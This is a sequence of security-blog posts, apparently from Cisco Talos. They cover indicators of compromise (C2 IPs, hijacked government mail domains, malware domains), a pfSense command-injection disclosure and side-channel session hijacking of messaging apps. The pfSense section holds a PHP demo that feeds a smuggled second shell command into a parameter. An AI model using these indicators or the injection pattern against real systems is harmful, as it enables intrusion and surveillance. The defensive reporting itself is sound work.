82285b6743cc5e3545d8e67740a4d04c5aed138d9f31d7c16bd11188a2042969
45a9edb24d4174592c69d9d37a534a518fbe2a88d3817fc0cc739e455883b8ff

C2 Server IPs:


185.20.184.138
185.20.187.8
185.161.211.72

C2 Server Domains:


0ffice36o[.]com

DNS Hijack Domains (pointed to 185.20.187.8):


2018-11-14 : memail.mea.com.lb
2018-11-06 : webmail.finance.gov.lb
2018-09-24 : mail.apc.gov.ae
2018-09-15 : mail.mgov.ae
2018-09-13 : adpvpn.adpolice.gov.ae

Domains in the MEA certificate (on 185.20.187.8):


memail.mea.com.lb
autodiscover.mea.com.lb
owa.mea.com.lb
www.mea.com.lb
autodiscover.mea.aero
autodiscover.meacorp.com.lb
mea.aero
meacorp.com.lb
memailr.meacorp.com.lb
meoutlook.meacorp.com.lb
tmec.mea.com.lb

Threat Roundup for Nov. 23 to Nov. 30


Today, Talos is publishing a glimpse into the most prevalent threats we've observed between Nov. 23 and Nov. 30. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats are subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

The most prevalent threats highlighted in this roundup are:

  • Doc.Malware.Donoff-6759556-0
    Malware
    Donoff is a malicious Microsoft Office document that leverages the Windows Command shell to launch PowerShell and download and execute an executable.

  • Doc.Malware.00536d-6758981-0
    Malware
    Doc.Malware.00536d is the name given to a set of malicious documents that leverage VBA and PowerShell to install malware on the system. These documents usually convince the user to enable macros that, if executed, will download and install additional malware on the system.

  • Xls.Dropper.Donoff-6758223-0
    Dropper
    Donoff is a payload delivery Office document that leverages the Windows Command shell to launch PowerShell to download and execute an executable.

  • Win.Trojan.Emotet-6758832-0
    Trojan
    Emotet is a banking trojan that has remained relevant due to its continual evolution to better avoid detection. It is commonly spread via malicious emails, and saw a resurgence recently during Black Friday.

  • Doc.Malware.Valyria-6757519-0
    Malware
    Valyria is a malicious Microsoft Word document family that is used to distribute other malware. This campaign is currently spreading Emotet.

  • Win.Virus.Triusor-6757540-0
    Virus
    Triusor is a highly polymorphic malware family. All the binaries are packed and obfuscated to hinder static analysis, and the malware contains code that complicates dynamic analysis. Once executed, the samples perform code injection.

Threats

Doc.Malware.Donoff-6759556-0


Indicators of Compromise


Registry Keys
  • N/A
Mutexes
  • N/A
IP Addresses contacted by malware. Does not indicate maliciousness
  • N/A
Domain Names contacted by malware. Does not indicate maliciousness
  • 3ek6[.]top
  • pvy1[.]top
  • di29[.]top
  • 68d4[.]top
Files and or directories created
  • %LocalAppData%\Temp\sDweD.exe
  • %LocalAppData%\Temp\22dughsl.5qd.ps1
  • %LocalAppData%\Temp\4s5lt2th.dfc.psm1
  • %LocalAppData%\Temp\4e5cllpa.loj.psm1
  • %LocalAppData%\Temp\zbaj2qbd.fvr.ps1
File Hashes

Coverage

Screenshots of Detection

AMP

ThreatGrid

Umbrella

Malware

Doc.Malware.00536d-6758981-0


Indicators of Compromise


Registry Keys
  • N/A
Mutexes
  • _!SHMSFTHISTORY!_
IP Addresses contacted by malware. Does not indicate maliciousness
  • N/A
Domain Names contacted by malware. Does not indicate maliciousness
  • cysioniven[.]com
Files and or directories created
  • %LocalAppData%\Temp\ebeqjwi0.znf.ps1
  • %LocalAppData%\Temp\xnakv4n3.jj0.psm1
  • %LocalAppData%\Temp\glq130qw.p3e.psm1
  • %LocalAppData%\Temp\haoyv1sm.xuc.ps1
  • %AppData%\900194a4.exe
File Hashes

Coverage

Screenshots of Detection

AMP

ThreatGrid

Malware

Xls.Dropper.Donoff-6758223-0


Indicators of Compromise


Registry Keys
  • N/A
Mutexes
  • N/A
IP Addresses contacted by malware. Does not indicate maliciousness
  • N/A
Domain Names contacted by malware. Does not indicate maliciousness
  • momdopre[.]top
  • fileiiiililliliillitte[.]xyz
Files and or directories created
  • %SystemDrive%\Documents and Settings\Administrator\My Documents\rnohht`t.exe
  • %SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\upd22ef67fa.bat
  • %LocalAppData%\Temp\0w4zsktj.rxt.psm1
  • %LocalAppData%\Temp\vnug35u0.1pd.ps1
  • %LocalAppData%\Temp\cmnt0etf.0lt.psm1
  • %LocalAppData%\Temp\l21izk2f.bel.ps1
File Hashes

Coverage

Screenshots of Detection

AMP

ThreatGrid

Umbrella

Malware

Win.Trojan.Emotet-6758832-0


Indicators of Compromise


Registry Keys
  • N/A
Mutexes
  • N/A
IP Addresses contacted by malware. Does not indicate maliciousness
  • 67[.]216[.]131[.]134
  • 88[.]235[.]54[.]71
  • 24[.]190[.]11[.]79
  • 192[.]208[.]165[.]34
  • 98[.]6[.]145[.]178
  • 207[.]244[.]67[.]214
Domain Names contacted by malware. Does not indicate maliciousness
  • N/A
Files and or directories created
  • %WinDir%\SysWOW64\4WPGc4HlcDQ.exe
File Hashes

Coverage

Screenshots of Detection

AMP

ThreatGrid

Doc.Malware.Valyria-6757519-0


Indicators of Compromise


Registry Keys
  • N/A
Mutexes
  • N/A
IP Addresses contacted by malware. Does not indicate maliciousness
  • N/A
Domain Names contacted by malware. Does not indicate maliciousness
  • mnesenesse[.]com
  • ostrolista[.]com
Files and or directories created
  • %LocalAppData%\Temp\qrldddmq.hyb.psm1
  • %LocalAppData%\Temp\swfrthjc.vr1.ps1
File Hashes

Coverage

Screenshots of Detection

AMP

ThreatGrid

Umbrella

Malware

Win.Virus.Triusor-6757540-0


Indicators of Compromise


Registry Keys
  • N/A
Mutexes
  • N/A
IP Addresses contacted by malware. Does not indicate maliciousness
  • N/A
Domain Names contacted by malware. Does not indicate maliciousness
  • N/A
Files and or directories created
  • %WinDir%\Microsoft.NET\Framework\v1.1.4322\RegAsm.exe
  • %WinDir%\Microsoft.NET\Framework\v1.1.4322\ilasm.exe
  • %WinDir%\Microsoft.NET\Framework\v1.1.4322\jsc.exe
  • %WinDir%\Microsoft.NET\Framework\v1.1.4322\ngen.exe
  • %WinDir%\Microsoft.NET\Framework\v1.1.4322\vbc.exe
File Hashes

Coverage

Screenshots of Detection

AMP

ThreatGrid

Vulnerability Spotlight: Netgate pfSense system_advanced_misc.php powerd_normal_mode Command Injection Vulnerability


Brandon Stultz of Cisco Talos discovered these vulnerabilities.

Executive summary

Today, Cisco Talos is disclosing a command injection vulnerability in Netgate pfSense system_advanced_misc.php powerd_normal_mode. pfSense is a free, open-source firewall and router that also offers unified threat management, load balancing, multi-WAN, and more.

In accordance with our coordinated disclosure policy, Cisco Talos worked with Netgate to ensure that these issues are resolved and that an update is available for affected customers.


Vulnerability details

Netgate pfSense system_advanced_misc.php powerd_normal_mode Command Injection Vulnerability (TALOS-2018-0690 / CVE-2018-4019)

This command injection vulnerability in Netgate pfSense is due to a lack of sanitization on the 'powerd_normal_mode' parameter in POST requests to 'system_advanced_misc.php'. When processing requests to '/system_advanced_misc.php', the Netgate pfSense firewall does not properly sanitize the 'powerd_normal_mode' POST parameter.

For more information on this vulnerability, read the full advisory here.


Netgate pfSense system_advanced_misc.php powerd_ac_mode Remote Command Injection Vulnerability (TALOS-2018-0690 / CVE-2018-4020)

A command injection vulnerability in Netgate pfSense exists due to the lack of sanitization on the 'powerd_ac_mode' parameter in POST requests to 'system_advanced_misc.php'. When processing requests to '/system_advanced_misc.php', the Netgate pfSense firewall does not properly sanitize the 'powerd_ac_mode' POST parameter.

For more information on this vulnerability, read the full advisory here.

Netgate pfSense system_advanced_misc.php powerd_battery_mode Remote Command Injection Vulnerability (TALOS-2018-0690 / CVE-2018-4021)

A command injection vulnerability in Netgate pfSense exists due to the lack of sanitization on the 'powerd_battery_mode' parameter in POST requests to 'system_advanced_misc.php'. When processing requests to '/system_advanced_misc.php', the Netgate pfSense firewall does not properly sanitize the 'powerd_battery_mode' POST parameter.

For more information on this vulnerability, read the full advisory here.
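As an added illustration of the bug class the three advisories above describe (this is not pfSense's own code), the following hypothetical handler builds a powerd command from the three POST parameters, first by concatenating the values unchecked and then with a strict allowlist. The command path, the -a/-b/-n switches, the mode keywords and the function names are assumptions made for the example.

```php
<?php
// Added example: a stand-in for a system_advanced_misc.php-style handler.
// Not pfSense code; command line, switches and mode keywords are assumptions.

// The three POST parameters named in the advisories, each mapped to the
// powerd switch it is assumed to feed (AC, battery, unknown power state).
const POWERD_PARAMS = [
    'powerd_ac_mode'      => '-a',
    'powerd_battery_mode' => '-b',
    'powerd_normal_mode'  => '-n',
];

// Assumed allowlist of the mode keywords the UI offers.
const POWERD_MODES = ['hadp', 'adp', 'min', 'max'];

// Vulnerable pattern: POST values are concatenated into the command string
// without validation, so whatever the client sends, shell metacharacters
// included, becomes part of the command line handed to the shell.
function build_powerd_command_unsafe(array $post): string
{
    $cmd = '/usr/sbin/powerd';
    foreach (POWERD_PARAMS as $param => $flag) {
        if (isset($post[$param])) {
            $cmd .= " $flag " . $post[$param];
        }
    }
    return $cmd;
}

// Hardened pattern: a value is accepted only if it is a string that exactly
// matches one of the known keywords (strict comparison, no type juggling).
// escapeshellarg() quotes it as defence in depth; anything else is rejected
// before any command string exists.
function build_powerd_command_safe(array $post): string
{
    $cmd = '/usr/sbin/powerd';
    foreach (POWERD_PARAMS as $param => $flag) {
        if (!isset($post[$param])) {
            continue;
        }
        $mode = $post[$param];
        if (!is_string($mode) || !in_array($mode, POWERD_MODES, true)) {
            throw new InvalidArgumentException(
                "rejected $param: value is not a known powerd mode"
            );
        }
        $cmd .= " $flag " . escapeshellarg($mode);
    }
    return $cmd;
}

// Constructed requests standing in for $_POST: one well-formed, one carrying
// shell syntax in the parameter. Nothing here is executed; the strings are
// only built and printed to show what each handler would pass to the shell.
$benign  = ['powerd_ac_mode' => 'hadp', 'powerd_battery_mode' => 'min'];
$hostile = ['powerd_normal_mode' => 'adp; echo injected'];

echo "unsafe, benign:  ", build_powerd_command_unsafe($benign), PHP_EOL;
echo "unsafe, hostile: ", build_powerd_command_unsafe($hostile), PHP_EOL;
echo "safe, benign:    ", build_powerd_command_safe($benign), PHP_EOL;
try {
    build_powerd_command_safe($hostile);
} catch (InvalidArgumentException $e) {
    echo "safe, hostile:   blocked (", $e->getMessage(), ")", PHP_EOL;
}
```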

Conclusion

Cisco Talos tested and confirmed that Netgate pfSense CE 2.4.4-RELEASE is affected by these vulnerabilities.


Coverage

The following SNORTⓇ rules will detect exploitation attempts. Note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your Firepower Management Center or Snort.org.

Snort Rules: 48178

An introduction to offensive capabilities of Active Directory on UNIX

Tim Wadhwa-Brown of Portcullis Labs authored this post.

In preparation for our talk at Black Hat Europe, Security Advisory EMEAR would like to share the background on our recent research into some common Active Directory integration solutions. Just as with Windows, these solutions can be utilized to join UNIX infrastructure to enterprises' Active Directory forests.



Background to Active Directory integration solutions


Having seen an uptick in unique UNIX infrastructures that are integrated into customers' existing Active Directory forests, the question becomes, "Does this present any concerns that may not be well understood?" This quickly became "What if an adversary could get into a UNIX box and then breach your domain?"

A typical Active Directory integration solution (in this case, SSSD) bears a striking similarity to what a user would see on Windows. Notably, you have:

  • DNS – Used for name resolution
  • LDAP – Used for "one-time identification" and assertion of identity
  • Kerberos – Used for ongoing authentication
  • SSSD – Like LSASS
  • PAM – Like msgina.dll or the more modern credential providers


You can see a breakdown of this process here. Unlike Windows, there is no Group Policy for the most part (with some exceptions), so policies for sudo et al. are typically pushed as flat files to hosts.

Our research


Realistically, the threat models associated with each part of the implementation should be quite familiar to anyone securing a heterogeneous Windows network. From our work with a variety of customers, it has become apparent that the typical UNIX administrator who does not have a strong background in Windows and Active Directory will be ill-equipped to handle this threat. We've been talking about successful attacks against components such as LSASS and Kerberos for quite some time (Mimikatz dates back to at least April 2014, and dumping hashes has been around even longer: Pwdump, which dumped local Windows hashes, was published by Jeremy Allison in 1997). However, no one has really taken a concerted look at whether these attacks are possible on UNIX infrastructure, nor at how a blue team might spot an adversary performing them.

As a result of this research, we were able to develop tactics, tools, and procedures that might further assist an attacker in breaching an enterprise, and we began documenting and developing strategies to allow blue teams to detect and respond to such incursions appropriately. The presentation and the tactics, tools, and procedures for this talk will be available after our Black Hat Europe talk. They will also be available here, and at our GitHub repo.


Threat Roundup for Nov. 30 to Dec. 7


Today, Talos is publishing a glimpse into the most prevalent threats we've observed between Nov. 30 and Dec. 7. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats are subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

You can find an additional JSON file here that includes the IOCs in this post, as well as all hashes associated with the cluster. That list is limited to 25 hashes in this blog post. As always, please remember that all IOCs contained in this document are indicators, and one single IOC does not indicate maliciousness.

The most prevalent threats highlighted in this roundup are:

  • Xls.Downloader.Sload-6774021-0
    Downloader
    The Sload downloader launches PowerShell and gathers information about the infected system. The PowerShell may download the final payload or another downloader.

  • Doc.Downloader.Emotet-6765662-0
    Downloader
    Emotet is a banking trojan that has remained relevant due to its continual evolution to better avoid detection. It is commonly spread via malicious emails and saw a resurgence recently during Black Friday.

  • Win.Ransomware.Imps-6765847-0
    Ransomware
    This is a trojan horse virus that may steal information from the affected machine and download potentially malicious files that spread via removable drives.

  • Win.Virus.Sality-6765491-0
    Virus
    Sality is a file infector that establishes a peer-to-peer botnet. Although it has been prevalent for more than a decade, we continue to see new samples that require minor attention to keep detection consistent. Once a Sality client bypasses perimeter security, its goal is to execute a downloader component capable of executing additional malware.

  • Win.Packed.Passwordstealera-6765350-0
    Packed
    This malware has the ability to harvest stored credentials, keystrokes, screenshots, network activity, and more from computers where the software is installed.

  • Doc.Downloader.Sagent-6766662-0
    Downloader
    Sagent launches PowerShell through macros in Microsoft Office documents. The PowerShell then downloads unwanted software from remote websites.

Threats

Xls.Downloader.Sload-6774021-0


Indicators of Compromise


Registry Keys
  • N/A
Mutexes
  • KYTransactionServer.MutexObject.Administrator
IP Addresses contacted by malware. Does not indicate maliciousness
  • 216[.]239[.]34[.]21
  • 64[.]210[.]137[.]102
Domain Names contacted by malware. Does not indicate maliciousness
  • ipinfo[.]io
  • images2[.]imgbox[.]com
Files and or directories created
  • %LocalAppData%\Temp\psefaeec.nvt.psm1
  • %LocalAppData%\Temp\yb31jdzi.jxl.ps1
  • %UserProfile%\Documents\20181205\PowerShell_transcript.PC.ZR0bVMzf.20181205131554.txt
  • %LocalAppData%\Temp\CVR1B6D.tmp
File Hashes

Coverage

Screenshots of Detection

AMP

ThreatGrid

Malware

Doc.Downloader.Emotet-6765662-0


Indicators of Compromise


Registry Keys
  • <HKLM>\SYSTEM\CONTROLSET001\SERVICES\mwarepwd
Mutexes
  • N/A
IP Addresses contacted by malware. Does not indicate maliciousness
Domain Names contacted by malware. Does not indicate maliciousness
Files and or directories created
  • %LocalAppData%\Temp\GmP.exe
  • %TEMP%\GmP.exe
  • %LocalAppData%\Temp\hu3xyaa3.0rw.ps1
  • %LocalAppData%\Temp\mz5ranh3.2bk.psm1
  • %LocalAppData%\Temp\CVR2D3B.tmp
  • %LocalAppData%\Temp\~DFA8496BB3134EB884.TMP
  • %WinDir%\SysWOW64\YC4GWpe1p4Ot.exe
  • %SystemDrive%\Documents and Settings\Administrator\Cookies\administrator@gvmadvogados.com[1].txt
  • %SystemDrive%\~$4550683.doc
File Hashes

Coverage

Screenshots of Detection

AMP

ThreatGrid

Umbrella

Malware

Win.Ransomware.Imps-6765847-0


Indicators of Compromise


Registry Keys
  • N/A
Mutexes
  • Global\LOADPERF_MUTEX
  • DSKQUOTA_SIDCACHE_MUTEX
IP Addresses contacted by malware. Does not indicate maliciousness
  • 185[.]9[.]147[.]4
Domain Names contacted by malware. Does not indicate maliciousness
  • s142814[.]smrtp[.]ru
Files and or directories created
  • %LocalAppData%\Temp\98B68E3C.zip
  • %AppData%\Microsoft\Network\srcc.exe
  • %AppData%\Microsoft\Windows\audiohq.exe
  • %System32%\Tasks\ApplicationUpdateCallback
  • %System32%\Tasks\System\Security\upjf
  • %System32%\Tasks\System\smartscreen
File Hashes

Coverage

Screenshots of Detection

AMP

ThreatGrid

Umbrella

Win.Virus.Sality-6765491-0


Indicators of Compromise


Registry Keys
  • <HKLM>\SOFTWARE\WOW6432NODE\Creative Tech
  • <HKLM>\SOFTWARE\WOW6432NODE\CREATIVE TECH\Installation
  • <HKLM>\SOFTWARE\Creative Tech
Mutexes
  • csrss.exeM_328_
  • lsass.exeM_428_
  • smss.exeM_204_
  • svchost.exeM_840_
  • wininit.exeM_320_
  • winlogon.exeM_356_
IP Addresses contacted by malware. Does not indicate maliciousness
  • N/A
Domain Names contacted by malware. Does not indicate maliciousness
  • N/A
Files and or directories created
  • %System16%.ini
  • %SystemDrive%\autorun.inf
  • %System32%\CmdRtr64.DLL
  • %WinDir%\Temp\CRF000\APOMgr64.dll
  • %WinDir%\Temp\CRF000\APOMngr.dll
  • %WinDir%\Temp\CRF000\CmdRtr.dll
  • %WinDir%\Temp\CRF000\CmdRtr64.dll
  • %SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\bkhxl.exe
  • %SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\pelbwv.exe
  • %SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\scih.exe
  • %WinDir%\Temp\CRF000\creaf_ms.cab
  • %SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tlinwq.exe
  • %WinDir%\Temp\CRF000\mint.ini
  • %SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winbdaue.exe
  • %WinDir%\Temp\CRF000\mint32.exe
  • %SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winbhys.exe
  • %WinDir%\Temp\CRF000\mint64.exe
  • %SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winbqckk.exe
  • %SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\wincsbehn.exe
  • %SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winfudq.exe
  • %SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winimau.exe
  • %SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winjcsnxu.exe
  • %SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winkggnjk.exe
  • %SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winkmdt.exe
  • %SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\wintyttku.exe
  • %SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winvcpbm.exe
  • %SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winxraoo.exe
  • %SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\xatik.exe
  • %SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\xovxjg.exe
  • %SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\ydgy.exe
  • %SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\ysrnph.exe
  • %System32%\drivers\oiihn.sys
File Hashes

Coverage

Screenshots of Detection

AMP

ThreatGrid

Umbrella

Win.Packed.Passwordstealera-6765350-0


Indicators of Compromise


Registry Keys
  • N/A
Mutexes
  • N/A
IP Addresses contacted by malware. Does not indicate maliciousness
  • 173[.]194[.]175[.]108
  • 104[.]16[.]17[.]96
Domain Names contacted by malware. Does not indicate maliciousness
  • N/A
Files and or directories created
  • \??\E:\Sys.exe
  • \??\E:\autorun.inf
  • %LocalAppData%\Temp\holderwb.txt
  • %LocalAppData%\Temp\holdermail.txt
  • %SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\dw.log
  • %LocalAppData%\Temp\bhvBB7A.tmp
File Hashes

Coverage

Screenshots of Detection

AMP

ThreatGrid

Doc.Downloader.Sagent-6766662-0


Indicators of Compromise


Registry Keys
  • N/A
Mutexes
  • N/A
IP Addresses contacted by malware. Does not indicate maliciousness
  • 144[.]217[.]96[.]196
  • 68[.]66[.]224[.]4
  • 188[.]40[.]14[.]253
  • 185[.]45[.]66[.]219
  • 192[.]185[.]122[.]50
Domain Names contacted by malware. Does not indicate maliciousness
  • www[.]creativeagency[.]biz
  • mandujano[.]net
  • biogas-bulgaria[.]efarmbg[.]com
  • mahimamedia[.]com
  • www[.]brgsabz[.]com
  • creativeagency[.]biz
Files and or directories created
  • %LocalAppData%\Temp\zUw.exe
  • %LocalAppData%\Temp\dxaf1lgn.ghy.ps1
  • %LocalAppData%\Temp\mj5uf2iy.ilx.psm1
  • %LocalAppData%\Temp\CVRE3A0.tmp
  • %LocalAppData%\Temp\~DF21FCDFAA58A2E1E9.TMP
  • \TEMP\~$c0d21bd6c8e28fdebd78dd6505135b6cca400773990a89056de054ed7cbe29.doc
File Hashes

Coverage

Screenshots of Detection

AMP

ThreatGrid

Umbrella

Malware

in(Secure) messaging apps — How side-channel attacks can compromise privacy in WhatsApp, Telegram, and Signal

This blog post is authored by Vitor Ventura.

Executive summary


Messaging applications have been around since the inception of the internet. But recently, due to the increased awareness around mass surveillance in some countries, more users are installing end-to-end encrypted apps dubbed "secure instant messaging applications." These apps claim to encrypt users' messages and keep their content secure from any third parties.

However, after a deep dive into three of these secure messaging apps — Telegram, WhatsApp and Signal — we discovered that these services may not fulfill the promises they are meant to keep by putting users' confidential information at risk.

This is a serious problem, considering users download these apps in the hopes that their photos and messages will stay completely protected from third parties. These apps, which have countless users, cannot assume that their users are security educated and understand the risk of enabling certain settings on their device. As such, they have an obligation to explain the risks to users, and when possible, adopt safer defaults in their settings. In this post, we will show how an attacker could compromise these applications by performing side-channel attacks that target the operating system these apps delegated their security to. This post will dive into the methods in which these apps handle users' data. It will not include deep technical analysis of these companies' security.

Secure messaging applications


The concept behind secure messaging apps is that the content of all communication is encrypted between users without third parties involved. This means the service provider should not be able to read the content at any point.

To achieve end-to-end encryption, these applications either developed their own cryptographic protocol or adopted a third-party one. There are two main protocols these apps usually use: MT Protocol, developed by the secure messaging app Telegram, and Signal Protocol, developed by the software firm Open Whisper Systems. Since the MT Protocol implementation is not open source, most of the remaining applications either use Signal Protocol or implement a variation of it. Other applications, which are beyond the scope of this post, use this protocol only upon request from the user, not by default. That is the case for both Facebook Messenger, with its "Secret Conversations" feature, and Google Allo, with its "Incognito" chats. In both protocols, the cryptographic implementation has been highly scrutinised by the security community. Researchers in the past have analyzed publicly available source code and performed black-box analysis on real-time communication data.

However, a secure messaging application is much more than the cryptographic protocol. There are other components, such as the UI framework, the file storage model, group enrollment and other mechanisms, that could all be used as an attack vector. The vulnerability CVE-2018-1000136 in the Electron framework, which is used by both WhatsApp and Signal to build their user interface, is a good example of this. In a worst-case scenario, this vulnerability could allow an attacker to execute code remotely, or it could be used to copy messages.

These protocols are focused on keeping communications private while in transit. However, they usually provide no assurances about security while the data is being processed or once the message reaches the user's device. These protocols also don't manage group enrollment in these applications, as evidenced by the recent vulnerability found in WhatsApp. If an attacker compromises a WhatsApp server, they could add new members to a group without the group administrator's approval, allowing them to read new messages. This means there's the potential for a motivated actor to pick and choose specific WhatsApp groups to eavesdrop on, breaking the common understanding that this application provides bulletproof end-to-end encryption on all communications.

A presentation from Signal pledges to keep users' messages secure.
Source: http://www.signal.org

Behind the technical aspects of these applications is also an essential human aspect.

All of these applications advertise themselves as secure and privacy-minded. Some of them even go as far as to state that they are "safe from hacker attacks." All these statements are meant to create trust between the users and the application. Users trust that the applications will keep their private data safe.

Given that all of these applications claim to have millions of active users, it is clear that not all of these users will be cyber security-educated. As such, most of them won't have a full understanding of the risks and limitations posed by certain configurations on these applications. Keeping a person's privacy safe is more than just technology, it's also about providing the users with the correct information in a manner that they are able to understand the risks of their decisions, even without being security experts.

A Telegram advertisement states that it will keep users' messages "safe from hacker attacks."

Another significant feature that is advertised on these apps is their multi-platform capability. All apps support the major mobile device platforms and a desktop version. The typical user will rightfully believe that the security level is the same on all platforms. All the applications' websites present the idea that the security, privacy and platforms are kept at the same level.

This Signal advertisement shows users that they can use the app on various platforms.

Implementing security features tends to vary between these various platforms. Some platforms have more risks than others and these risks need to be communicated to the users since they will usually assume that each platform provides the same level of security protection.

The problem


The majority of these applications' users are not cybersecurity educated, which means they blindly trust these applications to keep their information safe and secure. It is clear that the source of such trust is the way the applications advertise their services.

On May 16, 2018, Talos published an article on Telegrab, a malware that can hijack sessions from Telegram. The concept is simple: If an attacker can copy the session tokens from a desktop user, then they will be able to hijack the session. The attacker won't need anything other than the information that is stored locally. It doesn't matter if the information is encrypted or not — by copying this information, the attacker will be able to use it to create a shadow session.

Following up on that research, we decided to check if the same technique was also applicable to other messaging applications, which was proven to be correct on all tested applications (Telegram, Signal, WhatsApp). Not all of these applications handled sessions in the same way, which leads to different consequences upon this attack.

In the next section, we will describe some of these attack scenarios where the sessions of these applications can be replicated or hijacked.

Applications

Telegram — Desktop session hijacking


Telegram seems to be the application where session hijacking is most likely to happen without users having any kind of indication that the attack occurred. Messages and images that are sent or received by the victim are replicated into the attacker's session.

Dual sessions on Telegram desktop environments.

Once the attacker starts the Telegram desktop application using the stolen session information, a new session is established without giving any warning to the user. The user has to check if there is an additional session in use. This is carried out by navigating through the settings, which isn't obvious to the average user. When the message does show up on Telegram, it isn't obvious to the average user, either.

Signal — Desktop session hijacking


Signal handles the session hijacking as a race condition. When the attacker starts the application using the stolen session information, they both compete for the session. As a result, the user will see error messages on the desktop application, but not the mobile device.

Sessions created on Mac will work on Windows and vice-versa.

However, by the time the victim receives these messages, the attacker already has access to all contacts and previous chats which were not deleted.

In order to prevent the race condition, the attacker can simply delete the session information. When the user starts the application, they will receive a request to re-link the application.

For a security expert, this would be a red flag. But for the average user, they may think it's just an error in the application.
Two sessions for the same device.

When the user creates the second session, it will only be visible from the mobile device, and by default, the two sessions will have the same name.

Therefore, the attacker will have the ability to view all messages and even impersonate the victims. The messages sent by the attacker will reach the victim's legitimate devices, but the attacker can delete them while sending them, avoiding detection. If the impersonation is done using the "Disappearing messages" feature, it will be even harder for the victim to identify the imitation.

WhatsApp — Desktop session hijacking


WhatsApp is the only application that has implemented a notification mechanism if there's a second session opened on a desktop. Under normal operations, if an attacker uses the stolen session information, the victim should receive a warning like the image below.

WhatsApp multiple login notice.

This notice pops up in the application that is online when the second session is created. The second session will be live and usable until the user makes a decision. So, by the time this notice appears, the attacker already has access to all of the victim's contacts and previous messages. The attacker will also be able to impersonate the victim until there is an answer to the message box. In an attack scenario where the victim is away from the terminal, the attacker will have access until the victim is back at the terminal. The victim will have no obvious warning on the mobile device alerting them of what happened. The existing notice appears every time the victim uses the desktop client; a second session won't change that warning.

This warning mechanism has a flaw, as it is possible for an attacker to bypass it following the procedure below.


The attacker can simplify the procedure by skipping step 4 and waiting before executing step 5. The result will be the same since they will have access to the same messages. The attacker will only lose access if the victim manually terminates the session on the mobile device.

This vulnerability was disclosed to Facebook according to our coordinated disclosure policy. All the advisory details can be found here.

Telegram — Mobile session shadowing


Session abuse isn't a problem just in the desktop environment. Cloned mobile applications abuse these sessions in the wild.

Shadow sessions on a mobile device.

In the mobile environment, users should be less concerned about their session being compromised, since under normal circumstances it is much harder to obtain. The fundamental problem lies in the fact that Telegram allows shadow sessions to coexist on the same device, based on the same phone number, while handling them in different applications.

This enables an attack scenario where an attacker can read all messages and contacts on Telegram until the session is terminated. With mobile devices, sessions are never terminated unless the user specifically requests termination through the options menu.

There is another scenario on the Android platform, in which a malicious application could create a shadow session without any user intervention. The malicious application only needs the "read SMS" and the "kill background process" permissions, which are not usually considered dangerous and could easily pass Google Play store verifications.

The Telegram registration process starts by requesting a phone number, which is confirmed through an SMS that contains a unique code. If a user tries to register the same phone number again, Telegram will send a code over the Telegram channel and not an SMS.

The change in the delivery channel, from SMS to Telegram message, should prevent malicious applications from creating a shadow session without user interaction since they wouldn't be able to read the code. However, if the registration is not completed within a specific time frame, Telegram assumes the user doesn't have access to the Telegram application and will send a new code over SMS.

This backup mechanism creates a race condition that can be exploited by a malicious application, leading to a shadow session being created without user interaction. This entire process is outlined below.


From this point on, the malicious application will have access to all contacts and to all past and future messages that are not in "Secret chats."

Conclusion


Secure instant messaging applications have a solid track record of protecting the information while in transit, even going as far as protecting the information from their own servers. However, they fall short when it comes to protecting application state and user information, delegating this protection to the operating system.

Signal protocol developers predicted this session hijacking. The security considerations of the session management protocol (Sesame protocol) contain a sub-chapter dedicated to device compromise, which states, "Security is catastrophically compromised if an attacker learns a device's secret values, such as the identity private key and session state."

Since this attack vector was predicted by the protocol developers themselves, individual users and corporations should be aware that these applications are not risk free. As such, it becomes more important that companies that use these apps to transmit private and sensitive information employ endpoint technology that better protects these assets.

Microsoft Patch Tuesday — December 2018: Vulnerability disclosures and Snort coverage

Microsoft released its monthly security update today, disclosing a variety of vulnerabilities in several of its products. The latest Patch Tuesday covers 38 vulnerabilities, nine of which are rated “critical” and 29 that are considered “important.” There are no “moderate” or “low” vulnerabilities in this release.

The advisories cover bugs in the Chakra scripting engine, several Microsoft Office products and the Microsoft Internet Explorer web browser.

For coverage of these vulnerabilities, check out our Snort blog post on this week's rule update.

Critical vulnerabilities


